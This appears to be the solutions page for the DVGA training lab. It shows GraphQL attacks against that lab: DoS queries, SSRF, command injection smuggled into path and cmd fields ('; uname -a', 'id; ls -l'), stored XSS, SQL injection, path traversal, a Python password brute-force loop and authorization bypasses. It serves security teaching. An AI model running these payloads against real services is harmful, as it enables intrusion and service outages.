Challenge Solutions

Overview

Legend

• - GraphQL Official Documentation / Blog Posts
• - Code Snippet
• - GraphQL Security Utility
• - Published Vulnerability (H1, CVE, etc.)

  There may be more than one way to exploit any given vulnerability, the solutions demonstrated below aim to illustrate one way of achieving successful exploitation.
  Some solutions include code snippets that are written in Python and use the requests library for HTTP requests.

Getting Started

The first essential step in every security test is to gain a bit of insight into the technology the remote server is using. By knowing the technologies in use, you can start building up a plan how to attack the application or the underlying infrastructure.

For GraphQL, a tool called graphw00f exists. Let's explore how it can help us achieve detection and fingerprinting of GraphQL.

Detecting GraphQL

Detecting where GraphQL lives is pretty trivial, there are common places where you would typically see a graphql endpoint. For example, /graphql, /v1/graphql, etc.

Point graphw00f at DVGA to figure out where GraphQL lives:

$>  python3 graphw00f.py -d -t http://localhost:5013/graphql
                +-------------------+
                |     graphw00f     |
                +-------------------+
                  ***            ***
                **                  ***
              **                       **
    +--------------+              +--------------+
    |    Node X    |              |    Node Y    |
    +--------------+              +--------------+
                  ***            ***
                     **        **
                       **    **
                    +------------+
                    |   Node Z   |
                    +------------+

                graphw00f - v1.0.3
          The fingerprinting tool for GraphQL
           Dolev Farhi (dolev@lethalbit.com)

Checking http://dvga.example.local:5013/graphql
[*] Found GraphQL at http://dvga.example.local:5013/graphql
[*] You can now try and fingerprint GraphQL using: graphw00f.py -t http://dvga.example.local:5013/graphql

Fingerprinting GraphQL

graphw00f can try and fingerprint GraphQL servers in order to determine the underlying implementation. By knowing what specific engine runs GraphQL, you can map what security mechanisms you may face during an assessment.

Point graphw00f at DVGA to figure out what technology it's running.

$> python3 graphw00f.py -t http://dvga.example.local:5013/graphql -f

[*] Checking if GraphQL is available at http://dvga.example.local:5013/graphql...
[*] Found GraphQL...
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Graphene)
[!] Attack Surface Matrix: https://github.com/dolevf/graphw00f/blob/main/docs/graphene.md
[!] Technologies: Python
[!] Homepage: https://graphene-python.org
[*] Completed.
              

As you can see, DVGA runs graphene. Use the Attack Surface Matrix to see how Graphene ships GrapQL by default from a security perspective.

Denial of Service :: Batch Query Attack

Problem Statement

GraphQL supports Request Batching. Batched requests are processed one after the other by GraphQL, which makes it a good candidate for Denial of Service attacks, as well as other attacks such as Brute Force and Enumeration.

If a resource intensive GraphQL query is identified, an attacker may leverage batch processing to call the query and potentially overwhelm the service for a prolonged period of time.

The query systemUpdate seems to be taking a long time to complete, and can be used to overwhelm the server by batching a system update request query.

Resources

• Apollo Blog - Batching Client GraphQL Queries
• Wallarm Blog - GraphQL Batching Attack

Exploitation Solution Show

# Beginner mode

# We chain multiple resource intensive queries in an array and pass it to GraphQL
data = [
{"query":"query {\n  systemUpdate\n}","variables":[]},
{"query":"query {\n  systemUpdate\n}","variables":[]},
{"query":"query {\n  systemUpdate\n}","variables":[]}
]

requests.post('http://host/graphql', json=data)

# Expert mode

Cost Query Analysis is enabled, which should prevent running batched system updates from going through.

Denial of Service :: Deep Recursion Query Attack

Problem Statement

In GraphQL, when types reference eachother, it is often possible to build a circular query that grows exponentially to a point it could bring the server down to its knees. Countermeasures such as max_depth can help mitigate these types of attacks.

The max_depth functionality acts as a safeguard, and defines how deep a query can get, ensuring deeply constructed queries will not be accepted by GraphQL.

The application offers two types, namely Owner and Paste, which reference eachother (an owner has a paste, and a paste has an owner), allowing a recursive query to be executed successfully.

Resources

• Securing GraphQL API - Apollo
• GitLab Issue #30096

Exploitation Solution Show

# Beginner mode:

query {
  pastes {
    owner {
      pastes {
        owner {
          pastes {
            owner {
              pastes {
                owner {
                  pastes {
                    owner {
                      pastes {
                        owner {
                          name
                        }
                      }
                    }
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

# Expert mode

# A depth check is implemented which should prevent malicious queries from going through.

Denial of Service :: Resource Intensive Query Attack

Problem Statement

Sometimes, certain queries may be computationally more expensive than others. A query may include certain fields that would trigger more complex backend logic in order to fulfill the query resolution. As attackers, we can abuse it by calling these actions frequently in order to cause resource exhaustion.

In GraphQL, a concept called Query Cost Analysis exists, which assigns weight values to fields that are more expensive to resolve than others. Using this feature, we can then create an upper threshold to reject queries that are expensive. Alternatively, a cache feature can be implemented to avoid repeating the same request in a short time window.

Resources

• Ruby GraphQL - Complexity and Depth

Exploitation Solution Show

# Beginner mode

# We measure the amount of time it takes a query to finish
import time

start = time.time()
requests.post('http://host/graphql',
    json={"query":"query {\n  systemUpdate\n}","variables":[]})
end = time.time()

print('Execution Time :: {} seconds'.format(end - start))

# Execution Time :: 81.95908403396606 seconds


# Expert mode

# A Query Cost Analysis protection is implemented which should prevent bulk system updates!

Denial of Service :: Field Duplication Attack

Problem Statement

Various GraphQL implementation do not bother de-duplicating repeating fields in GraphQL, allowing the user to multiply the same requested fields as they wish.

This causes extra load on the server to return the same fields over and over again.

There are a few ways in which this issue can be mitigated:

• Field De-Duplication
• Query Cost Analysis

Field De-Duplication can be achieved by using a middleware function to traverse the schema and remove any duplications, or simply analyze repeating patterns in order to reject the query.

Query Cost Analysis will be beneficial against these attacks, since each field will ultimately result in increased cost.

Resources

• Ruby GraphQL - Complexity and Depth

Exploitation Solution Show

# Beginner mode

query {
  pastes {
    owner {
      pastes {
            ipAddr # 1
            ipAddr # 2
            ipAddr # 3
            ipAddr # 4
            ipAddr # 1000
          }
        }
      }
}

Denial of Service :: Aliases based Attack

Problem Statement

In GraphQL, it is possible to run multiple queries without needing to batch them together.

If batching is disabled, you could build a query composed of multiple aliases calling the same query or mutation, if the server is not analyzing the cost of the query, it will be possible to overwhelm the server's resources by using expensive queries using aliases.

• Query Middleware
• Query Cost Analysis

Query Middleware is needed to identify the use of aliases in order to make a decision (reject/allow) based on your business logic.

Query Cost Analysis will be beneficial against these attacks, since each query will ultimately result in increased cost.

Resources

• GraphQL - Aliases
• Ruby GraphQL - Complexity and Depth

Exploitation Solution Show

# Beginner mode
# q1, q2 and q3 represent the aliases.

query {
  q1: systemUpdate
  q2: systemUpdate
  q3: systemUpdate
}

Information Disclosure :: GraphQL Introspection

Problem Statement

GraphQL Introspection is a special query that uses the __schema field to interrogate GraphQL for its schema.

Introspection in itself is not a weakness, but a feature. However, if it is made available, it can be used and abused by attackers seeking information about your GraphQL implementation, such as what queries or mutations exist.

It is recommended to disable introspection in production to avoid data leakages.

Note: If introspection query is disabled, attackers may fall back to using the Field Suggestion feature to understand what queries and fields are supported by your GraphQL. Refer to Information Disclosure :: GraphQL Field Suggestionsattack for more information.

Resources

• GraphQL - Introspection
• Ruby GraphQL - Introspection Guide
• ShapeShifter - GQL Security tool for Schema Extraction
• Clairvoyance - GraphQL Schema Enumeration Discovery Tool
• graphw00f - GraphQL Fingerprinting Tool

Exploitation Solution Show

# Beginner mode

# Navigate to http://host/graphiql
# Run Introspection query

query {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
  }
}


# Expert mode

# Introspection is disabled, enumeration of fields and dynamic testing is required to understand the structure of the application.

Information Disclosure :: GraphQL Interface

Problem Statement

GraphQL has a an Integrated Development Environment named GraphiQL (note the i) that allows constructing queries in a friendly user interface.

GraphiQL is usually found in paths such as: /graphiql or /console, however, it can be in other places too.

Resources

• Apollo GraphiQL
• Gatsby on GraphiQL

Exploitation Solution Show

# Beginner mode

# Browse to http://host/graphiql

# Expert mode

# GraphiQL will be disabled.

Information Disclosure :: GraphQL Field Suggestions

Problem Statement

GraphQL has a feature for field and operation suggestions. When a developer wants to integrate with a GraphQL API and types an incorrect field, as an example, GraphQL will attempt to suggest nearby fields that are similar.

Field suggestions is not a vulnerability in itself, but a feature that can be abused to gain more insight into GraphQL's schema, especially when Introspection is not allowed.

Resources

• Python's graphql-core suggestion feature
• GraphQL Introspection
• Clairvoyance - GQL Security tool for field enumeration
• graphw00f - GraphQL Fingerprinting Tool

Exploitation Solution Show

# Beginner and Expert modes

# Supplying incorrect fields will trigger GraphQL to disclose fields with similar names
query {
  system
}

>>> Response:
{
  "errors": [
    {
      "message": "Cannot query field \"system\" on type \"Query\". Did you mean \"pastes\", \"paste\", \"systemUpdate\" or \"systemHealth\"?",
      "locations": [
        {
          "line": 2,
          "column": 3
        }
      ]
    }
  ]
}

Information Disclosure :: Server Side Request Forgery

Problem Statement

The GraphQL mutation importPaste accepts arbitrary host, port and scheme to import pastes from and does not restrict input such as localhost or other internal servers from being used. This may allow forging requests on behalf of the application server to target other network nodes.

Resources

• PortSwigger - Server Side Request Forgery
• OWASP - Server Side Request Forgery

Exploitation Solution Show

# Beginner and Expert modes

# Any arbitrary host and ports can be used to make an outbound HTTP request
mutation {
  importPaste(host:"localhost", port:57130, path:"/", scheme:"http") {
    result
  }
}

Code Execution :: OS Command Injection #1

Problem Statement

The mutation importPaste allows escaping from the parameters and introduce a UNIX command by chaining commands. The GraphQL resolver does not sufficiently validate the input, and passes it directly into cURL.

Resources

• OWASP - Command Injection

Exploitation Solution Show

# Beginner mode

# Import Paste allows specifying UNIX characters to break out of the URL provided to importPaste, using characters such as ";" "&&", "||", and more.
mutation  {
  importPaste(host:"localhost", port:80, path:"/ ; uname -a", scheme:"http"){
    result
  }
}

# Expert mode

# Import Paste filters characters such as ";" and "&" but not "|", if you manage to cause the import to fail, you can double pipe it to a command that will execute in the context of the operating system.
mutation {
  importPaste(host:"hostthatdoesnotexist.com", port:80, path:"/ || uname -a", scheme:"http") {
    result
  }
}

Code Execution :: OS Command Injection #2

Problem Statement

The query systemDiagnostics accepts certain UNIX binaries as parameters for debugging purposes, such as whoami, ps, etc. It acts as a restricted shell. However, it is protected with a username and password. After obtaining the correct credentials, the restricted shell seems to be bypassable by chaining commands together.

Resources

• Netsparker - Command Injection

Exploitation Solution Show

# System Diagnostics suffers from weak restricted shell implementation

query {
  systemDiagnostics(username:"admin", password:"password", cmd:"id")
}

>>> Response:
{
  "data": {
    "systemDiagnostics": "id: command not found"
  }
}


query {
  systemDiagnostics(username:"admin", password:"password", cmd:"id; ls -l")
}

>>> Response:
{
  "data": {
    "systemDiagnostics": "total 128\ndrwxr-xr- .. COLORTERM=truecolor\n_=/usr/bin/env\n"
  }
}

Injection :: Stored Cross Site Scripting

Problem Statement

The GraphQL mutations createPaste and importPaste allow creating and importing new pastes. The pastes may include any character without any restrictions. The pastes would then render in the Public and Private paste pages, which would result in a Cross Site Scripting vulnerability (XSS).

Resources

• PortSwigger - Stored Cross Site Scripting

Exploitation Solution Show

# Create New Paste allows special characters that would render in HTML.
mutation {
  createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) {
    paste {
      id
    }
  }
}

# Alternatively, importing a paste that includes Javascript will also result in the same behaviour.
mutation {
  importPaste(host:"localhost", port:80, path:"/xss.html"")
}

Injection :: Log Injection // Log Spoofing

Problem Statement

GraphQL actions such as mutation and query have the ability to take an operation name as part of the query. Here is an example query that uses MyName as an operation name:

query MyName {
    getMyName
    {
      first
      last
    }
  } 

The application is keeping track of all queries and mutations users are executing on this system in order to display them in the audit log.

However, the application is not doing a fair job at verifying the operation name.

Resources

• CWE-117: Improper Output Neutralization for Logs

Exploitation Solution Show

# Beginner mode:

# Log spoof the operation to getPaste instead of createPaste
mutation getPaste{
  createPaste(title:"<script>alert(1)</script>", content:"zzzz", public:true) {
    paste {
      id
    }
  }
}

# Inject to the log arbitrary strings
query pwned {
  systemHealth
}


# Expert mode:
Log injection should be impossible due to operation name allow-listing. Only a selection of expected operation names can be provided.

Injection :: HTML Injection

Problem Statement

Similarly to the Cross Site Scripting problem, a paste can also include HTML tags that would render in the application, resulting in an HTML injection.

Resources

• Acunetix - HTML Injection

Exploitation Solution Show

# Create New Paste allows inserting HTML tags
mutation {
  createPaste(title:"<h1>hello!</h1>", content:"zzzz", public:true) {
    paste {
      id
    }
  }
}

# Content of HTML_Injection.html
# <h1> Hello </h1>!
mutation {
  importPaste(host:"localhost", port:80, path:"/HTML_Injection.html"")
}

Injection :: SQL Injection

Problem Statement

Pastes can be filtered using the filter parameter and it allows sending raw strings as query filters which are prone to SQL injections.

Resources

• PortSwigger - SQL Injection

Exploitation Solution Show

# The filter parameter of the pastes operation allows escaping the SQL command and inject a SQL payload
query {
  pastes(filter:"aaa ' or 1=1--") {
      content
      title
  }
}

Authorization Bypass :: GraphQL Interface Protection Bypass

Problem Statement

GraphiQL is available at the path /graphiql with a poorly implemented authorization check.

Resources

• CWE-639 - Authorization Bypass Through User-Controlled Key

Exploitation Solution Show

# Beginner mode

# Cookie 'env' stores a string with an instruction to disable graphiql. altering the value to contain graphiql:enable will bypass the protection

# Alter the env cookie to change "graphiql:disable" to "graphiql:enable" to bypass this check:
requests.post('http://host/graphiql',
  json={"query":"query IntrospectionQuery{__schema {queryType { name } mutationType { name } subscriptionType { name }}}"},
  cookies={'env':'graphiql:enable'}
)

# Expert mode
# GraphiQL interface is disabled.

Authorization Bypass :: GraphQL Query Deny List Bypass

Problem Statement

Creating an allow-list or deny-list for GraphQL is a common technique to prevent malicious queries from being resolved by GraphQL.

• By defining an allow-list, the application server will have a "known good" queries it will allow, and reject anything else.
• By defining a deny-list, the application server will have a "known bad" queries it will reject, and allow anything else.

In general, the allow-list approach is easier to maintain and less error-prone, since we only allow certain things we trust. It does not mean it cannot have flaws too.

The application has a deny-list mechanism implemented that attempts to reject Health queries using the systemHealth query.

The problem with this mechanism is that it does not take into consideration queries can have operation names.

Resources

• Apollo - Securing your GraphQL From Malicious Queries
• CWE-184: Incomplete List of Disallowed Inputs

Exploitation Solution Show

# Expert mode

# Query systemHealth directly by calling /graphql and supplying an arbitrary operation name.

requests.post('http://host/graphql', json={"query":"query getPastes { systemHealth }"}, headers={'X-DVGA-MODE':'Expert'})

Miscellaneous :: Arbitrary File Write // Path Traversal

Problem Statement

The mutation uploadPaste allows uploading pastes from the user's computer by specifying the file along with the filename. The pastes are then stored on the server under a dedicated folder. The filename argument allows any string, effectively providing the ability to write the file to any location on the server's filesystem by traversing folders using ../../

Resources

• OWASP - Path Traversal

Exploitation Solution Show

# Traverse the filesystem and place the file where you desire.
mutation {
  uploadPaste(filename:"../../../../../tmp/file.txt", content:"hi"){
    result
  }
}

Miscellaneous :: GraphQL Query Weak Password Protection

Problem Statement

The query systemDiagnostics is an administrative functionality that allows running a subset of system commands on the server. The query is governed by a username and password before processing the command.

The password is weak, and the server has no rate limiting protections. This allows attackers to easily conduct brute force attacks against the server.

Resources

• CWE-307 - Improper Restriction of Excessive Authentication Attempts

Exploitation Solution Show

# Brute Force attack with a list of passwords:
passwordlist = ['admin123', 'pass123', 'adminadmin', '123']

for password in passwordlist:
  resp = requests.post('http://host/graphql',
  json = {
    "query":"query {\n  systemDiagnostics(username:\"admin\", password:\"{}\", cmd:\"ls\")\n}".format(password),
    "variables":None
  })

  if not 'errors' in resp.text:
    print('Password is', password)

Denial of Service :: Circular Fragment

Problem Statement

The GraphQL API allows creating circular fragments, such that two fragments are cross-referencing eachother. When a Spread Operator (...) references a fragment, which in return references a 2nd fragment that leads to the former fragment, may cause a recursive loop and crash the server.

Resources

• GraphQL Specification - Fragments Must Not Form Cycles
• GraphQL Cop - Security Auditing Tool for GraphQL

Exploitation Solution Show

query {
    ...A
}

fragment A on PasteObject {
    content
    title
    ...B
}

fragment B on PasteObject {
    content
    title
    ...A
}

Information Disclosure :: Stack Trace Errors

Problem Statement

The dedicated GraphiQL API endpoint /graphiql throws stack traces and debugging messages upon erroneous queries.

Exploitation Solution Show

# Navigate to /graphiql
# Query using invalid syntax and observe the response.
query {
    pastes {
        conteeeent
    }
}

Authorization Bypass :: GraphQL JWT Token Forge

Problem Statement

Without logging in a user is able to forge the user identity claim within the JWT token for the me query operation.

Exploitation Solution Show

query {
    me(token: "FORGED_TOKEN") {
        id
        username
        password
    }
}